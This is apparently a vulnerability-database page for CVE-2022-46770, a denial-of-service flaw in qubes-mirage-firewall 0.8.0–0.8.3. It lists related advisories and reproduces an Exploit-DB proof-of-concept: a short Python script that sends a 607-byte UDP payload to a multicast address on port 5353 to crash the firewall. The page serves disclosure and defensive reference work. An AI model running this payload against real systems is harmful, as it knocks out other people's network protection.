| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
| qubes-mirage-firewall v0.8.3 - Denial Of Service Exploit | 31 Mar 202300:00 | – | zdt | |
| CVE-2022-46770 | 7 Dec 202222:11 | – | circl | |
| MirageOS qubes-mirage-firewall 资源管理错误漏洞 | 7 Dec 202200:00 | – | cnnvd | |
| CVE-2022-46770 | 7 Dec 202200:00 | – | cve | |
| CVE-2022-46770 | 7 Dec 202200:00 | – | cvelist | |
| qubes-mirage-firewall v0.8.3 - Denial Of Service (DoS) | 31 Mar 202300:00 | – | exploitdb | |
| Mirage firewall for QubesOS 0.8.0-0.8.3 Denial of Service (DoS) Exploit | 18 Jan 202319:50 | – | metasploit | |
| CVE-2022-46770 | 7 Dec 202220:15 | – | nvd | |
| OSEC-2022-01 Infinite loop in console output on xen | 7 Dec 202200:00 | – | osv | |
| Mirage firewall for QubesOS 0.8.0-0.8.3 Denial of Service | 31 Aug 202400:00 | – | packetstorm |
`# Exploit Title: qubes-mirage-firewall v0.8.3 - Denial Of Service (DoS)
# Date: 2022-12-04
# Exploit Author: Krzysztof Burghardt <[email protected]>
# Vendor Homepage: https://mirage.io/blog/MSA03
# Software Link: https://github.com/mirage/qubes-mirage-firewall/releases
# Version: >= 0.8.0 & < 0.8.4
# Tested on: Qubes OS
# CVE: CVE-2022-46770
#PoC exploit from https://github.com/mirage/qubes-mirage-firewall/issues/166
#!/usr/bin/env python3
from socket import socket, AF_INET, SOCK_DGRAM
TARGET = "239.255.255.250"
PORT = 5353
PAYLOAD = b'a' * 607
s = socket(AF_INET, SOCK_DGRAM)
s.sendto(PAYLOAD, (TARGET, PORT))
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation